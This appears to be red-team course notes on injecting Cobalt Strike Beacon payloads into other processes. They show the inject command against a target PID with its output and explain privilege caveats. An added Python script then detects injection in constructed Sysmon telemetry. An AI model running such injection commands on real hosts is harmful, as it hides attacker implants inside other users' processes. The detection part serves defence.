Process Injection

Process injection allows us to inject arbitrary shellcode into a process of our choosing. You can only inject into processes that you can obtain a handle to with enough privileges to write into their memory. In a non-elevated context, this usually limits you to your own processes; in an elevated context, it also includes processes owned by other users.

Beacon has two main injection commands - shinject and inject. shinject injects arbitrary shellcode read from a binary file on your attacking machine, and inject injects a full Beacon payload for the specified listener.

If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:

beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102


Where:

  • 4464 is the target PID.

  • x64 is the architecture of the process.

  • tcp-local is the listener name.


The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.


The same caveats also apply - if the user closes this process, the Beacon will be lost. The injected shellcode uses ExitThread as its exit function, so exiting the Beacon won't kill the host process.
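From the defender's side, the two facts above are what telemetry can key on: the injector must first open a handle to the target with write and thread-creation rights, and a remote-thread style injection then starts a thread in a process that did not create it. The following is an added example, not part of the original notes or of Beacon itself, that scans constructed Sysmon-style records (Event ID 10 ProcessAccess and Event ID 8 CreateRemoteThread, flattened to Key=Value lines for this example) and flags the combination. The access-right constants are the standard winnt.h values; the record layout, image paths and start address are constructed sample data, and the rule that suppresses same-image access is an assumption made here to reduce noise, so it will miss injection into a process of the same image.

```python
"""Flag Sysmon ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8)
records that carry the rights process injection needs (added example)."""
import re
from dataclasses import dataclass

# Standard Windows process access rights (winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# A remote-thread injector must be able to allocate/protect memory
# (VM_OPERATION), write the payload (VM_WRITE) and start it (CREATE_THREAD).
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


@dataclass
class Finding:
    event_id: int
    source: str
    target: str
    reason: str


# Key=Value or Key="quoted value with spaces" (constructed flattened layout).
_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Parse one flattened record into a dict of field name -> value."""
    return {k: v.strip('"') for k, v in _FIELD_RE.findall(line)}


def classify(rec):
    """Return a Finding if the record looks like cross-process injection."""
    event_id = int(rec.get("EventID", 0))
    src, dst = rec.get("SourceImage", ""), rec.get("TargetImage", "")
    # Assumption: same-image access is treated as benign here (noise control).
    cross_process = src.lower() != dst.lower()
    if event_id == 10:
        granted = int(rec.get("GrantedAccess", "0"), 16)
        if cross_process and granted & INJECT_MASK == INJECT_MASK:
            return Finding(10, src, dst,
                           f"handle opened with 0x{granted:X} (write+thread rights)")
    elif event_id == 8 and cross_process:
        return Finding(8, src, dst,
                       f"remote thread started at {rec.get('StartAddress', '?')}")
    return None


def scan(lines):
    """Run classify() over every record and keep the hits, in log order."""
    return [f for f in (classify(parse_record(line)) for line in lines) if f]


# Constructed sample telemetry, not captured from a real host.
SAMPLE_LOG = [
    r'EventID=10 SourceImage="C:\Users\bob\AppData\Local\Temp\update.exe" '
    r'TargetImage="C:\Windows\System32\mmc.exe" GrantedAccess=0x1FFFFF',
    # PROCESS_QUERY_LIMITED_INFORMATION only: cannot write or create threads.
    r'EventID=10 SourceImage="C:\Windows\System32\svchost.exe" '
    r'TargetImage="C:\Windows\System32\mmc.exe" GrantedAccess=0x1000',
    # Same image opening a full-access handle (browser parent/child): suppressed.
    r'EventID=10 SourceImage="C:\Program Files\Mozilla Firefox\firefox.exe" '
    r'TargetImage="C:\Program Files\Mozilla Firefox\firefox.exe" GrantedAccess=0x1FFFFF',
    r'EventID=8 SourceImage="C:\Users\bob\AppData\Local\Temp\update.exe" '
    r'TargetImage="C:\Windows\System32\mmc.exe" StartAddress=0x00007FF7A1B20000',
    # Unrelated event type is ignored.
    r'EventID=1 Image="C:\Windows\System32\notepad.exe" CommandLine=notepad.exe',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"[Event {finding.event_id}] {finding.source} -> {finding.target}: "
              f"{finding.reason}")
```

Two records survive the scan: the ProcessAccess where update.exe opens mmc.exe with a mask containing all three injection rights, and the CreateRemoteThread from the same source into the same target. Note that Beacon's exit function choice (ExitThread) means the host process keeps running after the Beacon exits, so the process-access and remote-thread events are the signal to watch for; a later process-exit event will not appear.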
